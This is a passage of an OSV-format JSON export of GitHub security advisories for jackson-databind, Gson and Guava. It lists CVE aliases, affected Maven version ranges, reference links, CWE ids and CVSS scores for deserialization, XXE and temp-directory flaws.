"2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-vfqx-33qm-g869/GHSA-vfqx-33qm-g869.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.6.7.5" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-vfqx-33qm-g869/GHSA-vfqx-33qm-g869.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36189" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2996" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/33d96c13fe18a2dad01b19ce195548c9acea9da4" }, { "type": "WEB", "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210205-0005" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-03-18T23:14:22Z", "nvd_published_at": "2021-01-06T23:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-w3f4-3q6j-rh82", "published": "2020-06-30T20:40:50Z", "modified": "2024-03-11T05:18:22.727055Z", "aliases": [ "CVE-2018-5968" ], "summary": "Deserialization of Untrusted Data in jackson-databind", "details": "FasterXML jackson-databind through 2.8.11 and 2.9.x through 2.9.3 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 and CVE-2017-17485 deserialization flaws. This is exploitable via two different gadgets that bypass a blacklist.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.1" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c 2.8.11", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-w3f4-3q6j-rh82/GHSA-w3f4-3q6j-rh82.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.4" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-w3f4-3q6j-rh82/GHSA-w3f4-3q6j-rh82.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.7.9.5" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-w3f4-3q6j-rh82/GHSA-w3f4-3q6j-rh82.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-5968" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/1899" }, { "type": "WEB", "url": "https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/454be8bb8c913be18298327a84ca45a280b61605" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/038b471e2efde2e8f96b4e0be958d3e5a1ff1d0" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/03ea0bec6293d4330b5ad19d1d62aca0e3cb6381" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4114" }, { "type": "WEB", "url": "https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US\u0026docId=emr_na-hpesbhf03902en_us" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20180423-0002" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1525" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0481" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0480" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0479" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0478" } ], "database_specific": { "cwe_ids": [ "CWE-184", "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-30T20:40:31Z", "nvd_published_at": "2018-01-22T04:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-wh8g-3j2c-rqj5", "published": "2021-12-09T19:15:00Z", "modified": "2024-03-15T00:31:15.123603Z", "aliases": [ "CVE-2020-35490" ], "summary": "Serialization gadgets exploit in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.datasources.PerUserPoolDataSource.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.9.10.8" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.7", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-wh8g-3j2c-rqj5/GHSA-wh8g-3j2c-rqj5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35490" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2986" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/41b8bdb5ccc1d8edb71acf1c8234da235a24249d" }, { "type": "WEB", "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210122-0005" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-04-08T21:06:39Z", "nvd_published_at": "2020-12-17T19:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-x2w5-5m2g-7h5m", "published": "2019-01-04T19:09:46Z", "modified": "2024-03-12T05:18:06.737632Z", "aliases": [ "CVE-2018-14720" ], "summary": "XML External Entity Reference (XXE) in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.7 might allow attackers to conduct external XML entity (XXE) attacks by leveraging failure to block unspecified JDK classes from polymorphic deserialization.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.7" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-x2w5-5m2g-7h5m/GHSA-x2w5-5m2g-7h5m.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.3" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.8.11.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-x2w5-5m2g-7h5m/GHSA-x2w5-5m2g-7h5m.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.5" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.9.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-x2w5-5m2g-7h5m/GHSA-x2w5-5m2g-7h5m.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-14720" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2097" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/82b01bfb6787097427ce97cec6a7127e93718bc05d1efd5eaffc228f@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ba973114605d936be276ee6ce09dfbdbf78aa56f6cdc6e79bfa7b8df@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/May/68" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190530-0003" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4452" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6a78f88716c3c57aa74ec05764a37ab3874769a347805903b393b286@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-x2w5-5m2g-7h5m" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:4037" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3892" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1823" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1822" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1140" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1108" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1107" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1106" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHBA-2019:0959" } ], "database_specific": { "cwe_ids": [ "CWE-502", "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T22:01:50Z", "nvd_published_at": null, "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4jrv-ppp4-jm57", "published": "2022-05-03T00:00:44Z", "modified": "2025-01-14T10:57:11.550318Z", "aliases": [ "CVE-2022-25647" ], "related": [ "CGA-828p-4xp8-m457" ], "summary": "Deserialization of Untrusted Data in Gson", "details": "The package `com.google.code.gson:gson` before 2.8.9 is vulnerable to Deserialization of Untrusted Data via the `writeReplace()` method in internal classes, which may lead to denial of service attacks.", "affected": [ { "package": { "name": "com.google.code.gson:gson", "ecosystem": "Maven", "purl": "pkg:maven/com.google.code.gson/gson" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.8.9" } ] } ], "versions": [ "1.1", "1.4", "1.5", "1.6", "1.7", "1.7.1", "1.7.2", "2.0", "2.1", "2.2", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3", "2.3.1", "2.4", "2.5", "2.6", "2.6.1", "2.6.2", "2.7", "2.8.0", "2.8.1", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-4jrv-ppp4-jm57/GHSA-4jrv-ppp4-jm57.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25647" }, { "type": "WEB", "url": "https://github.com/google/gson/pull/1991" }, { "type": "WEB", "url": "https://github.com/google/gson/pull/1991/commits" }, { "type": "PACKAGE", "url": "https://github.com/google/gson" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00015.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/09/msg00009.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220901-0009" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-COMGOOGLECODEGSON-1730327" }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5227" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2022-05-20T20:31:08Z", "nvd_published_at": "2022-05-01T16:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5mg8-w23w-74h3", "published": "2021-03-25T17:04:19Z", "modified": "2025-02-20T05:28:20.657499Z", "aliases": [ "CGA-7rjh-334q-pq8g", "CVE-2020-8908" ], "related": [ "CGA-3f7x-7jf4-vmjh", "CGA-4jpf-w26h-cg9j", "CGA-9wv6-wh8w-g624", "CGA-c59f-3389-82hg", "CGA-c5f6-f2ff-f6g9", "CGA-cffm-4mv2-8x2h", "CGA-f85c-8jfc-2g85", "CGA-gpmg-5xqr-j8wx", "CGA-m9rw-cj52-34gw", "CGA-mh7m-jqq7-vcwx", "CGA-v8xq-jj26-jf85", "CGA-vm4c-5phc-7w2r" ], "summary": "Information Disclosure in Guava", "details": "A temp directory creation vulnerability exists in Guava prior to version 32.0.0 allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava `com.google.common.io.Files.createTempDir()`. The permissions granted to the directory created default to the standard unix-like /tmp ones, leaving the files open. Maintainers recommend explicitly changing the permissions after the creation of the directory, or removing uses of the vulnerable method.\n", "affected": [ { "package": { "name": "com.google.guava:guava", "ecosystem": "Maven", "purl": "pkg:maven/com.google.guava/guava" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "32.0.0-android" } ] } ], "versions": [ "10.0", "10.0-rc1", "10.0-rc2", "10.0-rc3", "10.0.1", "11.0", "11.0-rc1", "11.0.1", "11.0.2", "12.0", "12.0-rc1", "12.0-rc2", "12.0.1", "13.0", "13.0-rc1", "13.0-rc2", "13.0.1", "14.0", "14.0-rc1", "14.0-rc2", "14.0-rc3", "14.0.1", "15.0", "15.0-rc1", "16.0", "16.0-rc1", "16.0.1", "17.0", "17.0-rc1", "17.0-rc2", "18.0", "18.0-rc1", "18.0-rc2", "19.0", "19.0-rc1", "19.0-rc2", "19.0-rc3", "20.0", "20.0-rc1", "21.0", "21.0-rc1", "21.0-rc2", "22.0", "22.0-android", "22.0-rc1", "22.0-rc1-android", "23.0", "23.0-android", "23.0-rc1", "23.0-rc1-android", "23.1-android", "23.1-jre", "23.2-android", "23.2-jre", "23.3-android", "23.3-jre", "23.4-android", "23.4-jre", "23.5-android", "23.5-jre", "23.6-android", "23.6-jre", "23.6.1-android", "23.6.1-jre", "24.0-android", "24.0-jre", "24.1-android", "24.1-jre", "24.1.1-android", "24.1.1-jre", "25.0-android", "25.0-jre", "25.1-android", "25.1-jre", "26.0-android", "26.0-jre", "27.0-android", "27.0-jre", "27.0.1-android", "27.0.1-jre", "27.1-android", "27.1-jre", "28.0-android", "28.0-jre", "28.1-android", "28.1-jre", "28.2-android", "28.2-jre", "29.0-android", "29.0-jre", "30.0-android", "30.0-jre", "30.1-android", "30.1-jre", "30.1.1-android", "30.1.1-jre", "31.0-android", "31.0-jre", "31.0.1-android", "31.0.1-jre", "31.1-android", "31.1-jre", "r03", "r05", "r06", "r07", "r08", "r09" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-5mg8-w23w-74h3/GHSA-5mg8-w23w-74h3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8908" }, { "type": "WEB", "url": "https://github.com/google/guava/issues/4011" }, { "type": "WEB", "url": "https://github.com/google/guava/issues/4011#issuecomment-1578991974" }, { "type": "WEB", "url": "https://github.com/google/guava/commit/feb83a1c8fd2e7670b244d5afd23cba5aca43284" }, { "type": "WEB", "url": "https://github.com/google/guava/commit/fec0dbc4634006a6162cfd4d0d09c962073ddf40" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd5d58088812cf8e677d99b07f73c654014c524c94e7fedbdee047604@%3Ctorque-dev.db.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd5d58088812cf8e677d99b07f73c654014c524c94e7fedbdee047604%40%3Ctorque-dev.db.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd2704306ec729ccac726e50339b8a8f079515cc29ccb77713b16e7c5@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd2704306ec729ccac726e50339b8a8f079515cc29ccb77713b16e7c5%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd01f5ff0164c468ec7abc96ff7646cea3cce6378da2e4aa29c6bcb95@%3Cgithub.arrow.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd01f5ff0164c468ec7abc96ff7646cea3cce6378da2e4aa29c6bcb95%40%3Cgithub.arrow.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcafc3a637d82bdc9a24036b2ddcad1e519dd0e6f848fcc3d606fd78f@%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcafc3a637d82bdc9a24036b2ddcad1e519dd0e6f848fcc3d606fd78f%40%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc607bc52f3507b8b9c28c6a747c3122f51ac24afe80af2a670785b97@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc607bc52f3507b8b9c28c6a747c3122f51ac24afe80af2a670785b97%40%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc2dbc4633a6eea1fcbce6831876cfa17b73759a98c65326d1896cb1a@%3Ctorque-dev.db.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc2dbc4633a6eea1fcbce6831876cfa17b73759a98c65326d1896cb1a%40%3Ctorque-dev.db.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbc7642b9800249553f13457e46b813bea1aec99d2bc9106510e00ff3@%3Ctorque-dev.db.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbc7642b9800249553f13457e46b813bea1aec99d2bc9106510e00ff3%40%3Ctorque-dev.db.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb8c0f1b7589864396690fe42a91a71dea9412e86eec66dc85bbacaaf@%3Ccommits.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb8c0f1b7589864396690fe42a91a71dea9412e86eec66dc85bbacaaf%40%3Ccommits.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb2364f4cf4d274eab5a7ecfaf64bf575cedf8b0173551997c749d322@%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb2364f4cf4d274eab5a7ecfaf64bf575cedf8b0173551997c749d322%40%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra7ab308481ee729f998691e8e3e02e93b1dedfc98f6b1cd3d86923b3@%3Cyarn-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": 